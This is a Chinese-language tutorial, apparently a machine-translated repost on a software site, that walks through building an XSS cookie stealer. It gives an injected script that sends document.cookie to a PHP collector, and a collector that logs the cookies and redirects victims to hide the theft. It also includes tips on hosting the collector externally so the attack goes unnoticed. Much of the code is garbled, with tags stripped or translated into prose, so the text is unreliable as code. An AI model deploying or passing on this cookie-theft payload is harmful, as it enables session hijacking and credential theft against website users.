JS写XSS偷饼干偷密码
JavaScript是web中最常用的脚本开发语言。js可以自动执行网站组件,管理网站内容,并在web行业中实现其他有用的功能。JS可以有很多功能,可以用于恶意目的,包括窃取包含密码和其他内容的用户cookie。
Cookie是站点请求并维护特定访问页面的信息。Cookie包含身份验证信息,如访问方法、时间、用户名和密码等。当用户访问一个给定的网站时,他们必须使用cookie。如果攻击者可以拦截cookie,他们可以使用cookie从用户那里窃取一些信息。对于特定的域名,JS可以保存或修改用户的cookie。也就是说,如果攻击者可以使用JS查看和修改cookie,那么它就可以成为一种有价值的黑客技术。
基于JS的攻击可以与代码注入等技术有效结合,这些技术可能会导致恶意代码在可信网站上执行。
让我们开始创造XSS偷饼干
步骤1:创建HTML测试页面
首先,创建一个标准的网页
index.html
然后,编辑index.html
Nanoindex.html html body/body/html测试页
步骤2:创建Cookie
创建一个可以插入cookie的基本参数——字符串。此cookie只能在此页面中使用。同样,后续注入也适用于保存在此页面中的所有cookies。
脚本类型=' text/JavaScript ' document . cookie=' username=Null Byte ';/script这个脚本将被插入到HTML的主体部分,如下所示:
如果运行脚本的页面打开,将设置一个cookie,但浏览器中不会显示任何内容。我们可以使用document.write函数直接查看cookie。
document . write(document . cookie);相同功能的脚本如下:
脚本类型=' text/JavaScript ' document . cookie=' username=Null Byte ';document . write(document . cookie);/脚本
在浏览器中打开页面,将出现以下cookie信息:
解释我们成功地为这个页面设置了一个“用户名=空字节”的cookie。
步骤3:用js脚本窃取Cookies
我们用来向服务器传递cookie的js字符串使用document.cookie参数,但是我们使用document.location中定义的url
document . location=' http://127 . 0 . 0 . 1/cookiestealer . PHP?c=' document.cookie在这个例子中,PHP文件位于localhost(127.0.0.1)中。
如果目标是社交媒体网站,需要向网站注入脚本,窃取的cookies应该发送到黑客控制的IP或URL。
将js代码吓到脚本标签中:
脚本类型=' text/JavaScript ' document . location=' http://127 . 0 . 0 . 1/cookiestealer . PHP?c=' document.cookie/scriptHTML页面代码应该如下所示:
剩下的cookie处理需要PHP来处理。
步骤4:用PHP处理Cookies
在上面的例子中,窃取cookie的PHP文件是cookiestealer.php,它位于127.0.0.1网站下。
在实际操作中,不能使用cookiestealer.php这样明显的名字,应该位于外部IP或URL下。
首先,在index.html的同一个目录中创新PHP文件。
纳米cookiestealer.php
需要定义的第一个元素是重定向页面跳转。
?phpheader(' location :https://Google.com ');为了防止用户意识到可能的攻击,最好将用户重定向到同一域中的其他页面,这样用户就不会意识到。
重定向完成后,需要额外的代码来处理cookie。
1.将cookie分配给变量;
$ cookies=$ _ GET 'c2.定义保存cookie的文件,保存该文件的位置由我们控制。
在这个例子中,文件名是log.txt
$file=fopen('log.txt ',' a ');3.将上述两个参数的内容写入日志文件,即将cookie写入log.txt
fwrite($file,$cookies。nn’);代码如下:
然后,您需要为PHP文件准备一个测试环境。
步骤5:测试Cookie窃取程序
在index.html和cookiestealer.php的同一个目录中建立一个PHP测试环境。
php -S 127.0.0.1:80
页面测试成功。
打开页面后,浏览器将被重定向到预定义的网站,即谷歌。
查看php服务器的日志,我们注意到一个参数被传递给了php文件,并执行了PHP代码。
最后,我们可以查看我们网站目录中的log.txt文件来查看cookies。
cat log.txt
日志文件包含cookie,这表明我们已经成功地使用js代码来窃取cookie。
第6:步攻击
Cookies包含重要的用户信息,通常是明文形式,有时甚至包含私钥信息。因此,使用js代码注入来窃取用户的cookies是非常重要的。
攻击可以被注入到任何HTML文件的脚本标签中。检测XSS的常用方法是使用alert。
脚本警报(“警报”);/script此脚本将尝试打开类似于以下内容的警报消息。如果打开,网站很容易受到xss攻击。
在真实的攻击中,黑客特别注意PHP文件的位置。如果处理不好,php文件很容易泄露黑客的位置。如果发生这种攻击,可以根据发送和保存cookie的位置来跟踪黑客。
上面的方法说明了JS作为攻击工具的威力。JS可以让网页更方便。如果一个网站容易被恶意JS注入,就会给用户和网站带来巨大的安全威胁。防止XSS攻击的重担落在了网络开发者身上。如果用户认为网站上运行的脚本不可信,也可以使用NoScript阻止js代码运行。
摘要
以上是边肖介绍的JS编写XSS cookie窃取器窃取密码的步骤的详细说明。希望对大家有帮助。如果你有任何问题,请给我留言,边肖会及时回复你。非常感谢您对我们网站的支持!
版权声明:JS写XSS偷饼干偷密码是由宝哥软件园云端程序自动收集整理而来。如果本文侵犯了你的权益,请联系本站底部QQ或者邮箱删除。